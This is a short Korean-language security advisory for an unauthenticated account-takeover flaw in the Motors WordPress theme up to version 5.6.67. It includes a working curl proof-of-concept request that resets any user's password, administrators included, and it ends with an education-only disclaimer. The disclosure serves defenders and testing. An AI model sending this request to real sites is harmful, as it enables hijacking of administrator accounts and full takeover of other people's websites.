
Motors <= 5.6.67 - 비밀번호 업데이트/계정 탈취를 통한 인증되지 않은 권한 상승
Motors WordPress 테마(버전 5.6.67 이하)의 비밀번호 재설정 기능에 치명적인 인증 결함이 있습니다.
이 테마는 엔드포인트를 통해 프런트엔드 비밀번호 업데이트 메커니즘을 제공하지만, 비밀번호 변경을 처리하기 전에 사용자 신원 또는 권한을 제대로 검증하지 않습니다.
그 결과, 인증되지 않은 공격자가 user_id, 임의의 hash_check, 새 비밀번호(stm_new_password)를 포함한 조작된 HTTP 요청을 보내 관리자를 포함한 모든 사용자의 비밀번호를 재설정할 수 있습니다.
악용될 경우 공격자는 다음을 수행할 수 있습니다:
관리자 액세스 권한 획득,
전체 사이트 장악,
영구 백도어 또는 악성 플러그인 배포.
이 결함은 로그인이 필요 없고, 로그를 모니터링하지 않는 한 눈에 띄는 흔적을 남기지 않는 경우가 많아 특히 위험합니다.
curl "https://local.ization/loginregister/?user_id=2&hash_check=%C0" --data "stm_new_password=randomizer" -XPOST -v -H 'User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Mobile Safari/537.36'
이 보고서는 교육 및 승인된 보안 테스트 목적으로만 제공됩니다.
허가 없이 이 취약점을 악용하면 법적 및 윤리적 경계를 위반할 수 있습니다.